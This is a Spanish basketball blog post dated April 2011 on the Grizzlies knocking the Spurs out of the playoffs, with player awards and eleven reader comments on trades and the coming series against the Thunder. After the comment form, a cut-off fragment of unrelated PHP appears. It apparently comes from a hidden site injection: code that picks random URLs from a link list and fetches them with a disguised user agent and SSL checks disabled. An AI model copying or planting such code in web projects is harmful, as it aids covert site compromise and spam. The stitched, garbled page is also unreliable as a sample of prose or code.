La Crónica (29/04/2011): Los ositos dejan de ser amorosos

30 de April de 2011 por txusma

La franquicia de las 12 derrotas en Playoffs deja atrás, definitivamente, el san benito de perdedora. Primero consiguieron la tan deseada victoria y ahora, hacen historia al convertirse en el segundo equipo que elimina al número 1 de la conferencia en primera ronda desde que esta es a 7 partidos.

Los ingredientes en el triunfo definitivo fueron los mismos: un Zach Randolph majestusoso, sobretodo en el último cuarto, destrozando el juego interior de los Spurs con la inestimable ayuda del pequeño de los Gasol. En el exterior, una defensa férrea, durísima, digna del equipo que tenían delante. Los Spurs no le perdieron la cara al partido en ningún momento y lucharon hasta la extenuación pero siempre fueron a remolque (91-99).

Posiblemente este sea el principio del fin de un equipo legendario. Duncan tiene ya 35 años y con él se acabará el ciclo tejano. Veremos cuanto tardan en volver a estar en la élite. No será fácil.

Y los Thunder… que vayan con cuidado.

PREMIOS

MVP: Grandísimo una vez más Zach Randolph. Sus 31 puntos y 11 rebotes impresionan pero aún más lo hacen los 17 puntos que anotó en el último cuarto, echándose completamente el equipo a las espaldas.

Sorpresa: Michel Conley sufrió problemas de faltas todo el partido pero en su lugar surgió el rookie Greivis Vazquez que está cuajando unos más que buenos playoffs. Anoche anotó 11 puntos, repartió 3 asistencia y estuvo muy sólido.

Decepción: Ni de lejos cuajó una mal partido (12 puntos, 10 rebotes) pero la constatación del declive de un gran jugador, del posiblemente mejor 4 de toda la historia, nos deja con un regusto amargo.

Esfuerzo en vano: Tony Parker se fue a los 23 puntos y Manu Ginobili a los 16, insuficientes para aguantar el aluvión de Memphis.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Vader dice:
    #1

    Pues si, esto si que es un fin de ciclo de verdad. Creo que pasará OKC pero será una serie muy dura.

    Saludos

      Citar

  2. Rafa dice:
    #2

    Memphis va a llegar liberado de presión a las semis. Va a estar divertido el duelo con OKC

      Citar

  3. German dice:
    #3

    Que decir, he visto casi todos los partidos de la serie y si bien estoy triste con la derrota de San Antonio no tengo mas que admirar la tremenda defensa de Memphis en toda la serie. Una lastima que despues de haber hecho una gran temporada se despidan en primera ronda, pero el juego interior de los Grizzlies fue demasiado, Jefferson estuvo inexistente, Randolph fue imparable y el tiro exterior de los Spurs estuvo muy por debajo de lo que fue en la temporada regular.
    Ojala no haya sido el ultimo partido de Duncan.

      Citar

  4. ralage dice:
    #4

    Muy buena serie y muy bien jugada por parte de los Grizzlies, con todo el equipo aportando(personalmente me han sorprendido mucho SYoung y GVasquez) y MUY grande Randolph,de los mejores de la liga conviertiendo rebotes ofensivos en puntos con sus palmeos y tiros cerca del aro.

      Citar

  5. Cocinitas dice:
    #5

    Cuidadin con Memphis q si secan exteriormente a los Thunder los veo en la final de conferencia, quien lo diria al comienzo de la temporada. Si renuevan a Marc tienen equipo para años en playoffs, ademas q seguro q algo conseguiran por Mayo. Alguien opina q seria bueno un trade por Gay y darle los galones a Randolph???

      Citar

  6. Denise dice:
    #6

    Bueno, vuelvo despues de una semanita con el pc roto, por lo que ultimamente no he podido ver todo el basket que hubiera deseado.
    El de anoche, como ya apuntais, marca el fin de ciclo de los Spurs, y a partir de ahora toca reconstruir empezando clarisimamente por Jefferson.
    No sé en que estado de forma se encuentra Blair, pero es raro que ni le de bola, y por su bien, Popovych debería darle a Splitter un rol mas importante en este equipo.
    Muy bien los Grizzlies, metiendo balones una y otra vez por dentro, haciendo cortes, y masacrando la pintura de los Spurs. A partir de ahora..a jugar sin presión y a divertirse, aunque no creo que puedan sorprender a los Thunder, muchos de los cortes y entradas a canasta de los Allen, Young, Conley y compañía se van a encontrar con las manos taponadoras de Ibaka y Perkins, y ante la ausencia de tiro exterior de los ositos, me da que los Thunder los van a flotar bastante y resguardar su zona que para algo tienen bastantes centimetros ahí.
    De las demás series, esperaba más batalla de Denver, me han sorpendido gratamente la lucha de los Pacers, me esperaba el pisoteo de los Celtics a los Knicks, el de Miami a Philly. Los Lakers, como siempre ganando cuando le salen de las pelotas, y los Mavs imponiendo su mayor rotacion sobre los Blazers.
    Y como no, hablar del descalabro de los Magic. No me esperaba que fuesen eliminados por los Hawks, aunque me da igual, porque desde que en verano se planificó la plantilla, y también despues desde el trade de Febrero, se veia venir que no tenían posibilidad alguna. Ahora lo que toca es la destitución de Van Gundy, que hace falta aire fresco en el banquillo, y un mejor trabajo de Otis Smith. A mi me sobran todos menos Howard, Nelson, Bass y Anderson.

      Citar

  7. Denise dice:
    #7

    @ Cocinitas.: Para mi Rudy Gay es un jugón y bajo ningun concepto lo traspasaría. Si Randolph sigue a este nivel, su megacontrato que acaba de firmar me parece correctísimo, lo malo es que a ver cuanto le dura esta actitud.

      Citar

  8. scriers dice:
    #8

    Dejemos ya de sospechar de Randolph, se ha ganado que no sea así. Podríamos sospechar hace dos años, pero es que lleva 2 temporadas que se sale. Ayer le dieron los balones calientes siempre a él y siempre lo hizo bien salvo un tiro demasiado forzado. Yo le tengo admiración a ese tipo, que no es del todo alto, parece incluso algo pasado de peso, y en realidad es un máquina. Vaya crack. Y también soy fan de Greivis Vazquez.
    En cuanto a los Spurs, no se puede vivir solo de Parker. Allen secó a Ginobilly a lo bestia y Duncan no podía con Marc, es que le eran muy grandes los pivot.

    En cuanto a compatibilidad con Rudy Gay, pues creo que existe. Rudy Gay este año ha aprendido a pasarla más y a globalizar su juego en todas las facetas. Cuando se recupere, si se le aprieta para que defienda, y sustituyendo a Young, las posibilidades de los Memphis se multiplican, guste o no.

    Es que es un equipo que no le gusta a nadie.

      Citar

  9. scriers dice:
    #9

    Competir contra él me refiero.

      Citar

  10. Viva_Dirk dice:
    #10

    Bueno, yo no creo que deban moverse demasiado, OJ Mayo puede ser una pieza muy importante para ellos, sea de titular o sea de 6º hombre con Tony Allen en el quinteto, el papel de Mayo podria ser similar al de Terry en Dallas, tiene una tremendas cualidades ofensivas y es aplicado en defensa, este año su rendimiento ha sido mas bajo por problemas extradeportivos. Un quinteto con Conley-Allen-Gay-Randolph-Gasol, con Mayo, Vasquez, Arthur y Young en el banco tiene buena pinta, quiza un center suplente les vendria bien y podrian firmarlo utilizando la mid level, alguien como Dalembert o Mohammed redondearia la plantilla.

    En caso de moverse fuerte deberian hacerlo por un base estelar, es decir Conley+Mayo+rondas o Thabeet por Chris Paul, esa es la única via de mejora clara para Memphis, porque el equipo ahora mismo no es para andar tocandolo demasiado.

      Citar

  11. Denise dice:
    #11

    Ojala pudieran hacer ese trade que propones de Paul por Conley+Mayo+rondas pero creo que los Hornets pedirían algo más a cambio. Y Thabeet ya no está en los Grizzlies, si mal no recuerdo se fue a los Rockets por Battier.
    Yo no haría muchos cambios para el año que viene, solo como bien decis arriba fichar un hombre alto suplente, porque están carentes de centimetros, e involucrar a OJ Mayo en el proyecto. Y también renovaría a Battier, una máquina de hacer intangibles y un buen tipo que conoce la casa y que hace de pegamento uniendo al grupo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>